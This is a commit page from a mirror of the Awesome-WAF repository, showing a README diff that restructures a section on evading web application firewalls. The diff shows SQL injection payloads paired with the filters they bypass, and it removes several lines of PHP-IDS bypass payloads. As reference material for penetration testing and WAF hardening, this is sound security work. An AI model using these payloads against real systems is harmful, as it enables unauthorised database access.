Awesome-Mirrors/Awesome-WAF
1
0
Fork 0
mirror of https://github.com/0xInfection/Awesome-WAF.git synced 2024-12-25 23:49:22 -05:00
Code Issues Packages Projects Releases Wiki Activity

Update README.md

Browse Source
This commit is contained in:
Infected Drake 2019-02-08 18:56:46 +05:30 committed by GitHub
parent 72469e0cb0
commit f9a21ed5ba
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 7 additions and 23 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

28
README.md
View File

@ -1337,10 +1337,10 @@ Wanna detect WAFs? Lets see how.
</tr> </tr>
</table> </table>
## Evasion Techniques # Evasion Techniques
Lets look at some methods of bypassing and evading WAFs. Lets look at some methods of bypassing and evading WAFs.
### Fuzzing/Bruteforcing: ## Fuzzing/Bruteforcing:
#### Method: #### Method:
Running a set of payloads against the URL/endpoint. Some nice fuzzing wordlists: Running a set of payloads against the URL/endpoint. Some nice fuzzing wordlists:
- Wordlists specifically for fuzzing - [Seclists Fuzzing](https://github.com/danielmiessler/SecLists/tree/master/Fuzzing). - Wordlists specifically for fuzzing - [Seclists Fuzzing](https://github.com/danielmiessler/SecLists/tree/master/Fuzzing).
@ -1358,14 +1358,16 @@ __Drawback:__
- This method often fails. - This method often fails.
- Many a times your IP will be blocked (temporarily/permanently). - Many a times your IP will be blocked (temporarily/permanently).
### Regex-Reversing: ## Regex-Reversing:
#### Method: ### Method:
- Most efficient method of bypassing WAFs. - Most efficient method of bypassing WAFs.
- Some WAFs rely upon matching the attack payloads with the signatures in their databases. - Some WAFs rely upon matching the attack payloads with the signatures in their databases.
- Payload matches the reg-ex the WAF triggers alarm. - Payload matches the reg-ex the WAF triggers alarm.
#### Techniques: #### Techniques:
__Scenario 1: SQL Injection__
##### • Step 1: ##### • Step 1:
__Keyword filer__: `and`, `or`, `union` __Keyword filer__: `and`, `or`, `union`
__Possible PHP Filter Code__: `preg_match('/(and|or|union)/i', $id)` __Possible PHP Filter Code__: `preg_match('/(and|or|union)/i', $id)`
@ -1423,24 +1425,6 @@ __Possible PHP Filter Code__: `preg_match('/(and|or|union|where|limit|group b
- __Filtered Injection__: `1 || lpad(user,7,1)` - __Filtered Injection__: `1 || lpad(user,7,1)`
- __Bypassed Injection__: `1%0b||%0blpad(user,7,1)` - __Bypassed Injection__: `1%0b||%0blpad(user,7,1)`
---
__PHP-IDS__ generally blocks input containing `=` or `(` or `'` following with any a string or integer e.g. `1 or 1=1`, `1 or '1'`, `1 or char(97)`. However, it can be bypassed using a statement that does not contain `=`, `(` or `'` symbols.
#### Scenario 1:
- __Filtered Injection__: `1 or 1 = 1`
- __Bypassed Injection__: `1 or 1`
#### Scenario 2:
- __Filtered injection__: `1 union select 1, table_name from information_schema.tables where table_name = 'users'`
- __Filtered Injection__: `1 union select 1, table_name from information_schema.tables where table_name between 'a' and 'z'`
- __Filtered Injection__: `1 union select 1, table_name from information_schema.tables where table_name between char(97) and char(122)`
- __Bypassed Injection__: `1 union select 1, table_name from information_schema.tables where table_name between 0x61 and 0x7a`
- __Bypassed Injection__: `1 union select 1, table_name from information_schema.tables where table_name like 0x7573657273`
__Drawbacks:__
- This method is time consuming.
## Google Dorks Approach: ## Google Dorks Approach:
## Known Bypasses: ## Known Bypasses: